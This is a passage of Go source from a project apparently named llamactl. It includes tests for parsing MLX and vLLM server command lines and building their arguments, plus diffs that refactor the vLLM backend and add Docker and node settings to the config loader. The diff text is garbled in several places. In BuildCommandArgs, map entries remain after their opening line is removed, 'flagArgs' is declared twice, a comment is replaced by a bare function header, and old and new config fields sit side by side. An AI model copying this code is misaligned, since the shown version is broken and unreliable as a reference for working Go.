 func TestParseMlxCommand(t *testing.T) {
 	tests := []struct {
 		name      string
 		command   string
 		expectErr bool
 		validate  func(*testing.T, *backends.MlxServerOptions)
 	}{
 		{
 			name:      "basic command",
 			command:   "mlx_lm.server --model /path/to/model --host 0.0.0.0",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.MlxServerOptions) {
 				if opts.Model != "/path/to/model" {
 					t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
 				}
 				if opts.Host != "0.0.0.0" {
 					t.Errorf("expected host '0.0.0.0', got '%s'", opts.Host)
 				}
 			},
 		},
 		{
 			name:      "args only",
 			command:   "--model /path/to/model --port 8080",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.MlxServerOptions) {
 				if opts.Model != "/path/to/model" {
 					t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
 				}
 				if opts.Port != 8080 {
 					t.Errorf("expected port 8080, got %d", opts.Port)
 				}
 			},
 		},
 		{
 			name:      "mixed flag formats",
 			command:   "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.MlxServerOptions) {
 				if opts.Model != "/path/model" {
 					t.Errorf("expected model '/path/model', got '%s'", opts.Model)
 				}
 				if opts.Temp != 0.7 {
 					t.Errorf("expected temp 0.7, got %f", opts.Temp)
 				}
 				if !opts.TrustRemoteCode {
 					t.Errorf("expected trust_remote_code to be true")
 				}
 			},
 		},
 		{
 			name:      "multiple value types",
 			command:   "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.MlxServerOptions) {
 				if opts.Model != "/test/model.mlx" {
 					t.Errorf("expected model '/test/model.mlx', got '%s'", opts.Model)
 				}
 				if opts.Port != 8080 {
 					t.Errorf("expected port 8080, got %d", opts.Port)
 				}
 				if opts.Temp != 0.7 {
 					t.Errorf("expected temp 0.7, got %f", opts.Temp)
 				}
 				if !opts.TrustRemoteCode {
 					t.Errorf("expected trust_remote_code to be true")
 				}
 				if opts.LogLevel != "DEBUG" {
 					t.Errorf("expected log_level 'DEBUG', got '%s'", opts.LogLevel)
 				}
 			},
 		},
 		{
 			name:      "empty command",
 			command:   "",
 			expectErr: true,
 		},
 		{
 			name:      "unterminated quote",
 			command:   `mlx_lm.server --model test.mlx --chat-template "unterminated`,
 			expectErr: true,
 		},
 		{
 			name:      "malformed flag",
 			command:   "mlx_lm.server ---model test.mlx",
 			expectErr: true,
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			var opts backends.MlxServerOptions
 			resultAny, err := opts.ParseCommand(tt.command)
 			result, _ := resultAny.(*backends.MlxServerOptions)
 			if tt.expectErr {
 				if err == nil {
 					t.Errorf("expected error but got none")
 				}
 				return
 			}
 			if err != nil {
 				t.Errorf("unexpected error: %v", err)
 				return
 			}
 			if result == nil {
 				t.Errorf("expected result but got nil")
 				return
 			}
 			if tt.validate != nil {
 				tt.validate(t, result)
 			}
 		})
 	}
 }
 func TestMlxBuildCommandArgs_BooleanFields(t *testing.T) {
 	tests := []struct {
 		name     string
 		options  backends.MlxServerOptions
 		expected []string
 		excluded []string
 	}{
 		{
 			name: "trust_remote_code true",
 			options: backends.MlxServerOptions{
 				TrustRemoteCode: true,
 			},
 			expected: []string{"--trust-remote-code"},
 		},
 		{
 			name: "trust_remote_code false",
 			options: backends.MlxServerOptions{
 				TrustRemoteCode: false,
 			},
 			excluded: []string{"--trust-remote-code"},
 		},
 		{
 			name: "multiple booleans",
 			options: backends.MlxServerOptions{
 				TrustRemoteCode:        true,
 				UseDefaultChatTemplate: true,
 			},
 			expected: []string{"--trust-remote-code", "--use-default-chat-template"},
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			args := tt.options.BuildCommandArgs()
 			for _, expectedArg := range tt.expected {
 				if !testutil.Contains(args, expectedArg) {
 					t.Errorf("Expected argument %q not found in %v", expectedArg, args)
 				}
 			}
 			for _, excludedArg := range tt.excluded {
 				if testutil.Contains(args, excludedArg) {
 					t.Errorf("Excluded argument %q found in %v", excludedArg, args)
 				}
 			}
 		})
 	}
 }
 func TestMlxBuildCommandArgs_ZeroValues(t *testing.T) {
 	options := backends.MlxServerOptions{
 		Port:            0,     // Should be excluded
 		TopK:            0,     // Should be excluded
 		Temp:            0,     // Should be excluded
 		Model:           "",    // Should be excluded
 		LogLevel:        "",    // Should be excluded
 		TrustRemoteCode: false, // Should be excluded
 	}
 	args := options.BuildCommandArgs()
 	// Zero values should not appear in arguments
 	excludedArgs := []string{
 		"--port", "0",
 		"--top-k", "0",
 		"--temp", "0",
 		"--model", "",
 		"--log-level", "",
 		"--trust-remote-code",
 	}
 	for _, excludedArg := range excludedArgs {
 		if testutil.Contains(args, excludedArg) {
 			t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
 		}
 	}
 }
--- a/pkg/backends/parser.go
+++ b/pkg/backends/parser.go
@@ -9,8 +9,8 @@ import (
 	"strings"
 )
-// ParseCommand parses a command string into a target struct
+// parseCommand parses a command string into a target struct
-func ParseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]bool, target any) error {
+func parseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]struct{}, target any) error {
 	// Normalize multiline commands
 	command = normalizeCommand(command)
 	if command == "" {
@@ -125,7 +125,7 @@ func extractArgs(command string, executableNames []string, subcommandNames []str
 }
 // parseFlags parses command line flags into a map
-func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any, error) {
+func parseFlags(args []string, multiValuedFlags map[string]struct{}) (map[string]any, error) {
 	options := make(map[string]any)
 	for i := 0; i < len(args); i++ {
@@ -163,7 +163,7 @@ func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any
 		if hasValue {
 			// Handle multi-valued flags
-			if multiValuedFlags[flagName] {
+			if _, isMultiValue := multiValuedFlags[flagName]; isMultiValue {
 				if existing, ok := options[flagName].([]string); ok {
 					options[flagName] = append(existing, value)
 				} else {
--- a/pkg/backends/vllm/vllm.go
+++ b/pkg/backends/vllm/vllm.go
@@ -1,9 +1,23 @@
-package vllm
+package backends
 import (
-	"llamactl/pkg/backends"
+	"fmt"
 	"llamactl/pkg/validation"
 )
 // vllmMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
 // Based on vLLM's CLI argument definitions with action='append' or List types
 // Keys use snake_case as the parser converts kebab-case flags to snake_case before lookup
 var vllmMultiValuedFlags = map[string]struct{}{
 	"api_key":         {}, // --api-key (action='append')
 	"allowed_origins": {}, // --allowed-origins (List type)
 	"allowed_methods": {}, // --allowed-methods (List type)
 	"allowed_headers": {}, // --allowed-headers (List type)
 	"middleware":      {}, // --middleware (action='append')
 	"lora_modules":    {}, // --lora-modules (custom LoRAParserAction, accepts multiple)
 	"prompt_adapters": {}, // --prompt-adapters (similar to lora-modules, accepts multiple)
 }
 type VllmServerOptions struct {
 	// Basic connection options (auto-assigned by llamactl)
 	Host string `json:"host,omitempty"`
@@ -130,58 +144,81 @@ type VllmServerOptions struct {
 	OverrideKVCacheALIGNSize  int    `json:"override_kv_cache_align_size,omitempty"`
 }
 func (o *VllmServerOptions) GetPort() int {
 	return o.Port
 }
 func (o *VllmServerOptions) SetPort(port int) {
 	o.Port = port
 }
 func (o *VllmServerOptions) GetHost() string {
 	return o.Host
 }
 func (o *VllmServerOptions) Validate() error {
 	if o == nil {
 		return validation.ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
 	}
 	// Use reflection to check all string fields for injection patterns
 	if err := validation.ValidateStructStrings(o, ""); err != nil {
 		return err
 	}
 	// Basic network validation for port
 	if o.Port < 0 || o.Port > 65535 {
 		return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
 	}
 	return nil
 }
 // BuildCommandArgs converts VllmServerOptions to command line arguments
-// Note: This does NOT include the "serve" subcommand, that's handled at the instance level
+// For vLLM native, model is a positional argument after "serve"
 // For vLLM, the model parameter is passed as a positional argument, not a --model flag
 func (o *VllmServerOptions) BuildCommandArgs() []string {
 	var args []string
-	// Add model as positional argument if specified
+	// Add model as positional argument if specified (for native execution)
 	if o.Model != "" {
 		args = append(args, o.Model)
 	}
-	// Create a copy of the options without the Model field to avoid including it as --model flag
+	// Create a copy without Model field to avoid --model flag
 	optionsCopy := *o
-	optionsCopy.Model = "" // Clear model field so it won't be included as a flag
+	optionsCopy.Model = ""
-	multipleFlags := map[string]bool{
+	// Use package-level multipleFlags variable
 		"api-key":         true,
 		"allowed-origins": true,
 		"allowed-methods": true,
 		"allowed-headers": true,
 		"middleware":      true,
 	}
-	// Build the rest of the arguments as flags
+	flagArgs := BuildCommandArgs(&optionsCopy, vllmMultiValuedFlags)
 	flagArgs := backends.BuildCommandArgs(&optionsCopy, multipleFlags)
 	args = append(args, flagArgs...)
 	return args
 }
-// ParseVllmCommand parses a vLLM serve command string into VllmServerOptions
+func (o *VllmServerOptions) BuildDockerArgs() []string {
 	var args []string
 	// Use package-level multipleFlags variable
 	flagArgs := BuildCommandArgs(o, vllmMultiValuedFlags)
 	args = append(args, flagArgs...)
 	return args
 }
 // ParseCommand parses a vLLM serve command string into VllmServerOptions
 // Supports multiple formats:
 // 1. Full command: "vllm serve --model MODEL_NAME --other-args"
 // 2. Full path: "/usr/local/bin/vllm serve --model MODEL_NAME"
 // 3. Serve only: "serve --model MODEL_NAME --other-args"
 // 4. Args only: "--model MODEL_NAME --other-args"
 // 5. Multiline commands with backslashes
-func ParseVllmCommand(command string) (*VllmServerOptions, error) {
+func (o *VllmServerOptions) ParseCommand(command string) (any, error) {
 	executableNames := []string{"vllm"}
 	subcommandNames := []string{"serve"}
 	multiValuedFlags := map[string]bool{
 		"middleware":      true,
 		"api_key":         true,
 		"allowed_origins": true,
 		"allowed_methods": true,
 		"allowed_headers": true,
 		"lora_modules":    true,
 		"prompt_adapters": true,
 	}
 	var vllmOptions VllmServerOptions
-	if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
+	if err := parseCommand(command, executableNames, subcommandNames, vllmMultiValuedFlags, &vllmOptions); err != nil {
 		return nil, err
 	}
--- a/pkg/backends/vllm/vllm_test.go
+++ b/pkg/backends/vllm/vllm_test.go
@@ -1,153 +0,0 @@
 package vllm_test
 import (
 	"llamactl/pkg/backends/vllm"
 	"slices"
 	"testing"
 )
 func TestParseVllmCommand(t *testing.T) {
 	tests := []struct {
 		name      string
 		command   string
 		expectErr bool
 	}{
 		{
 			name:      "basic vllm serve command",
 			command:   "vllm serve microsoft/DialoGPT-medium",
 			expectErr: false,
 		},
 		{
 			name:      "serve only command",
 			command:   "serve microsoft/DialoGPT-medium",
 			expectErr: false,
 		},
 		{
 			name:      "positional model with flags",
 			command:   "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
 			expectErr: false,
 		},
 		{
 			name:      "model with path",
 			command:   "vllm serve /path/to/model --gpu-memory-utilization 0.8",
 			expectErr: false,
 		},
 		{
 			name:      "empty command",
 			command:   "",
 			expectErr: true,
 		},
 		{
 			name:      "unterminated quote",
 			command:   `vllm serve "unterminated`,
 			expectErr: true,
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			result, err := vllm.ParseVllmCommand(tt.command)
 			if tt.expectErr {
 				if err == nil {
 					t.Errorf("expected error but got none")
 				}
 				return
 			}
 			if err != nil {
 				t.Errorf("unexpected error: %v", err)
 				return
 			}
 			if result == nil {
 				t.Errorf("expected result but got nil")
 			}
 		})
 	}
 }
 func TestParseVllmCommandValues(t *testing.T) {
 	command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
 	result, err := vllm.ParseVllmCommand(command)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
 	if result.Model != "test-model" {
 		t.Errorf("expected model 'test-model', got '%s'", result.Model)
 	}
 	if result.TensorParallelSize != 4 {
 		t.Errorf("expected tensor_parallel_size 4, got %d", result.TensorParallelSize)
 	}
 	if result.GPUMemoryUtilization != 0.8 {
 		t.Errorf("expected gpu_memory_utilization 0.8, got %f", result.GPUMemoryUtilization)
 	}
 	if !result.EnableLogOutputs {
 		t.Errorf("expected enable_log_outputs true, got %v", result.EnableLogOutputs)
 	}
 }
 func TestBuildCommandArgs(t *testing.T) {
 	options := vllm.VllmServerOptions{
 		Model:                "microsoft/DialoGPT-medium",
 		Port:                 8080,
 		Host:                 "localhost",
 		TensorParallelSize:   2,
 		GPUMemoryUtilization: 0.8,
 		EnableLogOutputs:     true,
 		AllowedOrigins:       []string{"http://localhost:3000", "https://example.com"},
 	}
 	args := options.BuildCommandArgs()
 	// Check that model is the first positional argument (not a --model flag)
 	if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
 		t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
 	}
 	// Check that --model flag is NOT present (since model should be positional)
 	if contains(args, "--model") {
 		t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
 	}
 	// Check other flags
 	if !containsFlagWithValue(args, "--tensor-parallel-size", "2") {
 		t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
 	}
 	if !contains(args, "--enable-log-outputs") {
 		t.Errorf("Expected --enable-log-outputs not found in %v", args)
 	}
 	if !contains(args, "--host") {
 		t.Errorf("Expected --host not found in %v", args)
 	}
 	if !contains(args, "--port") {
 		t.Errorf("Expected --port not found in %v", args)
 	}
 	// Check array handling (multiple flags)
 	allowedOriginsCount := 0
 	for i := range args {
 		if args[i] == "--allowed-origins" {
 			allowedOriginsCount++
 		}
 	}
 	if allowedOriginsCount != 2 {
 		t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
 	}
 }
 // Helper functions
 func contains(slice []string, item string) bool {
 	return slices.Contains(slice, item)
 }
 func containsFlagWithValue(args []string, flag, value string) bool {
 	for i, arg := range args {
 		if arg == flag && i+1 < len(args) && args[i+1] == value {
 			return true
 		}
 	}
 	return false
 }
--- a/pkg/backends/vllm_test.go
+++ b/pkg/backends/vllm_test.go
@@ -0,0 +1,323 @@
 package backends_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/testutil"
 	"testing"
 )
 func TestParseVllmCommand(t *testing.T) {
 	tests := []struct {
 		name      string
 		command   string
 		expectErr bool
 		validate  func(*testing.T, *backends.VllmServerOptions)
 	}{
 		{
 			name:      "basic vllm serve command",
 			command:   "vllm serve microsoft/DialoGPT-medium",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
 				if opts.Model != "microsoft/DialoGPT-medium" {
 					t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
 				}
 			},
 		},
 		{
 			name:      "serve only command",
 			command:   "serve microsoft/DialoGPT-medium",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
 				if opts.Model != "microsoft/DialoGPT-medium" {
 					t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
 				}
 			},
 		},
 		{
 			name:      "positional model with flags",
 			command:   "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
 				if opts.Model != "microsoft/DialoGPT-medium" {
 					t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
 				}
 				if opts.TensorParallelSize != 2 {
 					t.Errorf("expected tensor_parallel_size 2, got %d", opts.TensorParallelSize)
 				}
 			},
 		},
 		{
 			name:      "model with path",
 			command:   "vllm serve /path/to/model --gpu-memory-utilization 0.8",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
 				if opts.Model != "/path/to/model" {
 					t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
 				}
 				if opts.GPUMemoryUtilization != 0.8 {
 					t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
 				}
 			},
 		},
 		{
 			name:      "multiple value types",
 			command:   "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
 				if opts.Model != "test-model" {
 					t.Errorf("expected model 'test-model', got '%s'", opts.Model)
 				}
 				if opts.TensorParallelSize != 4 {
 					t.Errorf("expected tensor_parallel_size 4, got %d", opts.TensorParallelSize)
 				}
 				if opts.GPUMemoryUtilization != 0.8 {
 					t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
 				}
 				if !opts.EnableLogOutputs {
 					t.Errorf("expected enable_log_outputs true, got %v", opts.EnableLogOutputs)
 				}
 			},
 		},
 		{
 			name:      "empty command",
 			command:   "",
 			expectErr: true,
 		},
 		{
 			name:      "unterminated quote",
 			command:   `vllm serve "unterminated`,
 			expectErr: true,
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			var opts backends.VllmServerOptions
 			resultAny, err := opts.ParseCommand(tt.command)
 			result, _ := resultAny.(*backends.VllmServerOptions)
 			if tt.expectErr {
 				if err == nil {
 					t.Errorf("expected error but got none")
 				}
 				return
 			}
 			if err != nil {
 				t.Errorf("unexpected error: %v", err)
 				return
 			}
 			if result == nil {
 				t.Errorf("expected result but got nil")
 				return
 			}
 			if tt.validate != nil {
 				tt.validate(t, result)
 			}
 		})
 	}
 }
 func TestParseVllmCommandArrays(t *testing.T) {
 	command := "vllm serve test-model --middleware auth.py --middleware=cors.py --api-key key1 --api-key key2"
 	var opts backends.VllmServerOptions
 	resultAny, err := opts.ParseCommand(command)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
 	result, ok := resultAny.(*backends.VllmServerOptions)
 	if !ok {
 		t.Fatalf("expected *VllmServerOptions, got %T", resultAny)
 	}
 	expectedMiddleware := []string{"auth.py", "cors.py"}
 	if len(result.Middleware) != len(expectedMiddleware) {
 		t.Errorf("expected %d middleware items, got %d", len(expectedMiddleware), len(result.Middleware))
 	}
 	for i, v := range expectedMiddleware {
 		if i >= len(result.Middleware) || result.Middleware[i] != v {
 			t.Errorf("expected middleware[%d]=%s got %s", i, v, result.Middleware[i])
 		}
 	}
 	expectedAPIKeys := []string{"key1", "key2"}
 	if len(result.APIKey) != len(expectedAPIKeys) {
 		t.Errorf("expected %d api keys, got %d", len(expectedAPIKeys), len(result.APIKey))
 	}
 	for i, v := range expectedAPIKeys {
 		if i >= len(result.APIKey) || result.APIKey[i] != v {
 			t.Errorf("expected api_key[%d]=%s got %s", i, v, result.APIKey[i])
 		}
 	}
 }
 func TestVllmBuildCommandArgs_BooleanFields(t *testing.T) {
 	tests := []struct {
 		name     string
 		options  backends.VllmServerOptions
 		expected []string
 		excluded []string
 	}{
 		{
 			name: "enable_log_outputs true",
 			options: backends.VllmServerOptions{
 				EnableLogOutputs: true,
 			},
 			expected: []string{"--enable-log-outputs"},
 		},
 		{
 			name: "enable_log_outputs false",
 			options: backends.VllmServerOptions{
 				EnableLogOutputs: false,
 			},
 			excluded: []string{"--enable-log-outputs"},
 		},
 		{
 			name: "multiple booleans",
 			options: backends.VllmServerOptions{
 				EnableLogOutputs:    true,
 				TrustRemoteCode:     true,
 				EnablePrefixCaching: true,
 				DisableLogStats:     false,
 			},
 			expected: []string{"--enable-log-outputs", "--trust-remote-code", "--enable-prefix-caching"},
 			excluded: []string{"--disable-log-stats"},
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			args := tt.options.BuildCommandArgs()
 			for _, expectedArg := range tt.expected {
 				if !testutil.Contains(args, expectedArg) {
 					t.Errorf("Expected argument %q not found in %v", expectedArg, args)
 				}
 			}
 			for _, excludedArg := range tt.excluded {
 				if testutil.Contains(args, excludedArg) {
 					t.Errorf("Excluded argument %q found in %v", excludedArg, args)
 				}
 			}
 		})
 	}
 }
 func TestVllmBuildCommandArgs_ZeroValues(t *testing.T) {
 	options := backends.VllmServerOptions{
 		Port:                 0,     // Should be excluded
 		TensorParallelSize:   0,     // Should be excluded
 		GPUMemoryUtilization: 0,     // Should be excluded
 		Model:                "",    // Should be excluded (positional arg)
 		Host:                 "",    // Should be excluded
 		EnableLogOutputs:     false, // Should be excluded
 	}
 	args := options.BuildCommandArgs()
 	// Zero values should not appear in arguments
 	excludedArgs := []string{
 		"--port", "0",
 		"--tensor-parallel-size", "0",
 		"--gpu-memory-utilization", "0",
 		"--host", "",
 		"--enable-log-outputs",
 	}
 	for _, excludedArg := range excludedArgs {
 		if testutil.Contains(args, excludedArg) {
 			t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
 		}
 	}
 	// Model should not be present as positional arg when empty
 	if len(args) > 0 && args[0] == "" {
 		t.Errorf("Empty model should not be present as positional argument")
 	}
 }
 func TestVllmBuildCommandArgs_ArrayFields(t *testing.T) {
 	options := backends.VllmServerOptions{
 		AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
 		AllowedMethods: []string{"GET", "POST"},
 		Middleware:     []string{"middleware1", "middleware2", "middleware3"},
 	}
 	args := options.BuildCommandArgs()
 	// Check that each array value appears with its flag
 	expectedOccurrences := map[string][]string{
 		"--allowed-origins": {"http://localhost:3000", "https://example.com"},
 		"--allowed-methods": {"GET", "POST"},
 		"--middleware":      {"middleware1", "middleware2", "middleware3"},
 	}
 	for flag, values := range expectedOccurrences {
 		for _, value := range values {
 			if !testutil.ContainsFlagWithValue(args, flag, value) {
 				t.Errorf("Expected %s %s, not found in %v", flag, value, args)
 			}
 		}
 	}
 }
 func TestVllmBuildCommandArgs_EmptyArrays(t *testing.T) {
 	options := backends.VllmServerOptions{
 		AllowedOrigins: []string{}, // Empty array should not generate args
 		Middleware:     []string{}, // Empty array should not generate args
 	}
 	args := options.BuildCommandArgs()
 	excludedArgs := []string{"--allowed-origins", "--middleware"}
 	for _, excludedArg := range excludedArgs {
 		if testutil.Contains(args, excludedArg) {
 			t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args)
 		}
 	}
 }
 func TestVllmBuildCommandArgs_PositionalModel(t *testing.T) {
 	options := backends.VllmServerOptions{
 		Model:                "microsoft/DialoGPT-medium",
 		Port:                 8080,
 		Host:                 "localhost",
 		TensorParallelSize:   2,
 		GPUMemoryUtilization: 0.8,
 		EnableLogOutputs:     true,
 	}
 	args := options.BuildCommandArgs()
 	// Check that model is the first positional argument (not a --model flag)
 	if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
 		t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
 	}
 	// Check that --model flag is NOT present (since model should be positional)
 	if testutil.Contains(args, "--model") {
 		t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
 	}
 	// Check other flags
 	if !testutil.ContainsFlagWithValue(args, "--tensor-parallel-size", "2") {
 		t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
 	}
 	if !testutil.ContainsFlagWithValue(args, "--gpu-memory-utilization", "0.8") {
 		t.Errorf("Expected --gpu-memory-utilization 0.8 not found in %v", args)
 	}
 	if !testutil.Contains(args, "--enable-log-outputs") {
 		t.Errorf("Expected --enable-log-outputs not found in %v", args)
 	}
 	if !testutil.ContainsFlagWithValue(args, "--host", "localhost") {
 		t.Errorf("Expected --host localhost not found in %v", args)
 	}
 	if !testutil.ContainsFlagWithValue(args, "--port", "8080") {
 		t.Errorf("Expected --port 8080 not found in %v", args)
 	}
 }
--- a/pkg/config/config.go
+++ b/pkg/config/config.go
@@ -1,6 +1,7 @@
 package config
 import (
 	"log"
 	"os"
 	"path/filepath"
 	"runtime"
@@ -10,27 +11,41 @@ import (
 	"gopkg.in/yaml.v3"
 )
 // BackendSettings contains structured backend configuration
 type BackendSettings struct {
 	Command         string            `yaml:"command"`
 	Args            []string          `yaml:"args"`
 	Environment     map[string]string `yaml:"environment,omitempty"`
 	Docker          *DockerSettings   `yaml:"docker,omitempty"`
 	ResponseHeaders map[string]string `yaml:"response_headers,omitempty"`
 }
 // DockerSettings contains Docker-specific configuration
 type DockerSettings struct {
 	Enabled     bool              `yaml:"enabled"`
 	Image       string            `yaml:"image"`
 	Args        []string          `yaml:"args"`
 	Environment map[string]string `yaml:"environment,omitempty"`
 }
 // BackendConfig contains backend executable configurations
 type BackendConfig struct {
-	// Path to llama-server executable (llama.cpp backend)
+	LlamaCpp BackendSettings `yaml:"llama-cpp"`
-	LlamaExecutable string `yaml:"llama_executable"`
+	VLLM     BackendSettings `yaml:"vllm"`
-
+	MLX      BackendSettings `yaml:"mlx"`
 	// Path to mlx_lm executable (MLX-LM backend)
 	MLXLMExecutable string `yaml:"mlx_lm_executable"`
 	// Path to vllm executable (vLLM backend)
 	VllmExecutable string `yaml:"vllm_executable"`
 }
 // AppConfig represents the configuration for llamactl
 type AppConfig struct {
-	Server     ServerConfig    `yaml:"server"`
+	Server     ServerConfig          `yaml:"server"`
-	Backends   BackendConfig   `yaml:"backends"`
+	Backends   BackendConfig         `yaml:"backends"`
-	Instances  InstancesConfig `yaml:"instances"`
+	Instances  InstancesConfig       `yaml:"instances"`
-	Auth       AuthConfig      `yaml:"auth"`
+	Auth       AuthConfig            `yaml:"auth"`
-	Version    string          `yaml:"-"`
+	LocalNode  string                `yaml:"local_node,omitempty"`
-	CommitHash string          `yaml:"-"`
+	Nodes      map[string]NodeConfig `yaml:"nodes,omitempty"`
-	BuildTime  string          `yaml:"-"`
+	Version    string                `yaml:"-"`
 	CommitHash string                `yaml:"-"`
 	BuildTime  string                `yaml:"-"`
 }
 // ServerConfig contains HTTP server configuration
@@ -44,8 +59,14 @@ type ServerConfig struct {
 	// Allowed origins for CORS (e.g., "http://localhost:3000")
 	AllowedOrigins []string `yaml:"allowed_origins"`
 	// Allowed headers for CORS (e.g., "Accept", "Authorization", "Content-Type", "X-CSRF-Token")
 	AllowedHeaders []string `yaml:"allowed_headers"`
 	// Enable Swagger UI for API documentation
 	EnableSwagger bool `yaml:"enable_swagger"`
 	// Response headers to send with responses
 	ResponseHeaders map[string]string `yaml:"response_headers,omitempty"`
 }
 // InstancesConfig contains instance management configuration
@@ -109,6 +130,11 @@ type AuthConfig struct {
 	ManagementKeys []string `yaml:"management_keys"`
 }
 type NodeConfig struct {
 	Address string `yaml:"address"`
 	APIKey  string `yaml:"api_key,omitempty"`
 }
 // LoadConfig loads configuration with the following precedence:
 // 1. Hardcoded defaults
 // 2. Config file
@@ -120,18 +146,51 @@ func LoadConfig(configPath string) (AppConfig, error) {
 			Host:           "0.0.0.0",
 			Port:           8080,
 			AllowedOrigins: []string{"*"}, // Default to allow all origins
 			AllowedHeaders: []string{"*"}, // Default to allow all headers
 			EnableSwagger:  false,
 		},
 		LocalNode: "main",
 		Nodes:     map[string]NodeConfig{},
 		Backends: BackendConfig{
-			LlamaExecutable: "llama-server",
+			LlamaCpp: BackendSettings{
-			MLXLMExecutable: "mlx_lm.server",
+				Command:     "llama-server",
-			VllmExecutable:  "vllm",
+				Args:        []string{},
 				Environment: map[string]string{},
 				Docker: &DockerSettings{
 					Enabled: false,
 					Image:   "ghcr.io/ggml-org/llama.cpp:server",
 					Args: []string{
 						"run", "--rm", "--network", "host", "--gpus", "all",
 						"-v", filepath.Join(getDefaultDataDirectory(), "llama.cpp") + ":/root/.cache/llama.cpp"},
 					Environment: map[string]string{},
 				},
 			},
 			VLLM: BackendSettings{
 				Command: "vllm",
 				Args:    []string{"serve"},
 				Docker: &DockerSettings{
 					Enabled: false,
 					Image:   "vllm/vllm-openai:latest",
 					Args: []string{
 						"run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g",
 						"-v", filepath.Join(getDefaultDataDirectory(), "huggingface") + ":/root/.cache/huggingface",
 					},
 					Environment: map[string]string{},
 				},
 			},
 			MLX: BackendSettings{
 				Command: "mlx_lm.server",
 				Args:    []string{},
 				// No Docker section for MLX - not supported
 			},
 		},
 		Instances: InstancesConfig{
-			PortRange:            [2]int{8000, 9000},
+			PortRange: [2]int{8000, 9000},
-			DataDir:              getDefaultDataDirectory(),
+			DataDir:   getDefaultDataDirectory(),
-			InstancesDir:         filepath.Join(getDefaultDataDirectory(), "instances"),
+			// NOTE: empty strings are set as placeholder values since InstancesDir and LogsDir
-			LogsDir:              filepath.Join(getDefaultDataDirectory(), "logs"),
+			// should be relative path to DataDir if not explicitly set.
 			InstancesDir:         "",
 			LogsDir:              "",
 			AutoCreateDirs:       true,
 			MaxInstances:         -1, // -1 means unlimited
 			MaxRunningInstances:  -1, // -1 means unlimited
@@ -156,9 +215,22 @@ func LoadConfig(configPath string) (AppConfig, error) {
 		return cfg, err
 	}
 	// If local node is not defined in nodes, add it with default config
 	if _, ok := cfg.Nodes[cfg.LocalNode]; !ok {
 		cfg.Nodes[cfg.LocalNode] = NodeConfig{}
 	}
 	// 3. Override with environment variables
 	loadEnvVars(&cfg)
 	// If InstancesDir or LogsDir is not set, set it to relative path of DataDir
 	if cfg.Instances.InstancesDir == "" {
 		cfg.Instances.InstancesDir = filepath.Join(cfg.Instances.DataDir, "instances")
 	}
 	if cfg.Instances.LogsDir == "" {
 		cfg.Instances.LogsDir = filepath.Join(cfg.Instances.DataDir, "logs")
 	}
 	return cfg, nil
 }
@@ -179,6 +251,7 @@ func loadConfigFile(cfg *AppConfig, configPath string) error {
 			if err := yaml.Unmarshal(data, cfg); err != nil {
 				return err
 			}
 			log.Printf("Read config at %s", path)
 			return nil
 		}
 	}
@@ -244,15 +317,125 @@ func loadEnvVars(cfg *AppConfig) {
 		}
 	}
 	// Backend config
